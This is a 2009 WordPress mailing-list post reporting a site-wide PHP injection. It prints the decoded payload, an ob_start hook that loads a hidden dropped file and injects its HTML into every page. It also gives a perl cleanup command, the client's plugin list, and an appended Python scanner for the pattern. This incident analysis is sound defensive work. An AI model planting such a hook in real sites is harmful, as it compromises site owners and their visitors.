[wp-hackers] Weird PHP Injection
Lew Ayotte - Full Throttle Development
lew at fullthrottledevelopment.com
Thu Oct 29 19:45:46 UTC 2009
I'm not sure if anyone has seen this before... except for this guy:
http://wordpress.org/support/topic/320918?replies=8
But I just ran into an issue with a client using WP2.8.4. It seems like
every single file in WP (including themes and plugins) had this injected at
the top:
<?
/**/eval(base64_decode('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'));
?>
Which I decoded and prettied up for everyone:
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])) {
    $GLOBALS['sh_no'] = 1; // guard: install the hook only once per request
    // the real logic lives in a second dropped file hidden in the WP-phpMyAdmin plugin tree
    if(file_exists('/var/www/html/wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/styles/default/images/style.css.php'))
    {
        include_once('/var/www/html/wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/styles/default/images/style.css.php');
        // that file is expected to define gml(), which returns the HTML to be injected
        if(function_exists('gml')&&!function_exists('dgobh')) {
            if(!function_exists('gzdecode')) {
                // minimal gzip decoder: walk the header flags, then gzinflate() the body
                function gzdecode($R20FD65E9C7406034FADC682F06732868) {
                    $R6B6E98CDE8B33087A33E4D3A497BD86B = ord(substr($R20FD65E9C7406034FADC682F06732868,3,1)); // FLG byte
                    $R60169CD1C47B7A7A85AB44F884635E41 = 10; // fixed gzip header length
                    $R0D54236DA20594EC13FC81B209733931 = 0;
                    if($R6B6E98CDE8B33087A33E4D3A497BD86B&4) { // FEXTRA
                        $R0D54236DA20594EC13FC81B209733931 = unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));
                        $R0D54236DA20594EC13FC81B209733931 = $R0D54236DA20594EC13FC81B209733931[1];
                        $R60169CD1C47B7A7A85AB44F884635E41 += 2+$R0D54236DA20594EC13FC81B209733931;
                    }
                    if($R6B6E98CDE8B33087A33E4D3A497BD86B&8) { // FNAME: skip NUL-terminated name
                        $R60169CD1C47B7A7A85AB44F884635E41 = strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
                    }
                    if($R6B6E98CDE8B33087A33E4D3A497BD86B&16) { // FCOMMENT: skip NUL-terminated comment
                        $R60169CD1C47B7A7A85AB44F884635E41 = strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
                    }
                    if($R6B6E98CDE8B33087A33E4D3A497BD86B&2) { // FHCRC
                        $R60169CD1C47B7A7A85AB44F884635E41 += 2;
                    }
                    $RC4A5B5E310ED4C323E04D72AFAE39F53 = gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));
                    if($RC4A5B5E310ED4C323E04D72AFAE39F53 === FALSE) {
                        // not gzip after all: pass the buffer through untouched
                        $RC4A5B5E310ED4C323E04D72AFAE39F53 = $R20FD65E9C7406034FADC682F06732868;
                    }
                    return $RC4A5B5E310ED4C323E04D72AFAE39F53;
                }
            }
            // output-buffer callback: decompress the page and splice gml() in right after <body>
            function dgobh($RDA3E61414E50AEE968132F03D265E0CF) {
                Header('Content-Encoding: none');
                $R3E33E017CD76B9B7E6C7364FB91E2E90 = gzdecode($RDA3E61414E50AEE968132F03D265E0CF);
                if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)) {
                    return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
                } else {
                    return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
                }
            }
            ob_start('dgobh');
        }
    }
}
I have no idea what it does and I'm not sure if the WP-phpMyAdmin plugin had
a security hole or why it's part of this code. But I deactivated it on the
client's site.
To clean it up:
I first tried just upgrading him to WP2.8.5, but as soon as I visited the
site, it re-injected all the files with that crap. So I ran this script to
remove it from all files:
find . -name '*.php' | xargs perl -pi -e "s#\<\?
/\*\*/eval\(base64_decode\('.+'\)\); \?\>##g"
Then, for good measure I re-copied all the WP2.8.5 files back over. It seems
to have fixed it for the client.
Also, for what it's worth, these are all the plugins that he had
activated...
AddThis Social Bookmarking Widget
Advanced Excerpt
Akismet
Dagon Design Form Mailer
Event Calendar
Lightbox 2
NextGEN Gallery
Search & Replace
SEO Title Tag
Similarity
SimplePie Core
SimplePie Plugin for WordPress
Theme Switcher
Twitter Tools
Viper's Video Quicktags
WP-phpMyAdmin
wp-Table
WP-Table Reloaded
WPtouch iPhone Theme
I'm still digging to see if I can figure out where the actual hole was. Any
ideas?
Lew Ayotte
Full Throttle Development, LLC
706.363.0688
478.246.4627
lew at fullthrottledevelopment.com
http://fullthrottledevelopment.com
http://twitter.com/full_throttle
http://twitter.com/lewayotte
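As an added illustration, not code from Lew's message or from WordPress, here is a small Python scanner for the injection pattern he describes: it finds PHP files that start with the eval(base64_decode('...')) preamble, base64-decodes the blob purely for inspection (it is never executed), fingerprints it by the strings visible in the decoded hook above, and can strip the preamble in place. The regex, the indicator list and the demo tree it builds are my own constructions.

```python
import base64
import re
import tempfile
from pathlib import Path
# Matches the preamble quoted in the post: a short-open-tag block whose only statement
# is eval(base64_decode('<base64>')).  The regex is mine, not from the message.
INJECT_RE = re.compile(rb"<\?\s*/\*\*/eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\);\s*\?>\s*")
# Strings present in the decoded payload above; together they fingerprint the
# ob_start() output-rewriting hook without running any of it.
INDICATORS = [b"ob_start(", b"include_once(", b"gzdecode", b"preg_replace(", b"<body"]

def inspect_file(path):
    """Return (indicators, bytes_without_preamble) if infected, else None; never executes."""
    data = Path(path).read_bytes()
    m = INJECT_RE.match(data)
    if m is None:
        return None
    payload = base64.b64decode(m.group(1), validate=True)  # decode for inspection only
    return [s.decode() for s in INDICATORS if s in payload], data[m.end():]

def scan_tree(root):
    """Map relative path -> indicator list for every infected *.php under root."""
    hits = {}
    for p in Path(root).rglob("*.php"):
        result = inspect_file(p)
        if result is not None:
            hits[p.relative_to(root).as_posix()] = result[0]
    return hits

def clean_file(path):
    """Strip the preamble in place; True if the file was modified."""
    result = inspect_file(path)
    if result is None:
        return False
    Path(path).write_bytes(result[1])
    return True

def make_demo_tree():
    """Constructed sample site (not real data): two infected files, one clean."""
    root = tempfile.mkdtemp()
    fake_payload = b"if(function_exists('ob_start')){include_once('/tmp/x.css.php');ob_start('dgobh');}"
    preamble = b"<?\n/**/eval(base64_decode('" + base64.b64encode(fake_payload) + b"'));\n?>\n"
    files = {"index.php": preamble + b"<?php echo 'hello'; ?>\n",
             "wp-content/plugins/x/x.php": preamble + b"<?php // plugin\n",
             "wp-content/themes/t/clean.php": b"<?php echo 'clean'; ?>\n"}
    for rel, body in files.items():
        Path(root, rel).parent.mkdir(parents=True, exist_ok=True)
        Path(root, rel).write_bytes(body)
    return root
```

Because the decoder only looks at the payload, a scan is safe to run on a live site before any cleanup; re-run it after upgrading, since the post notes the files were re-infected as soon as the site was visited.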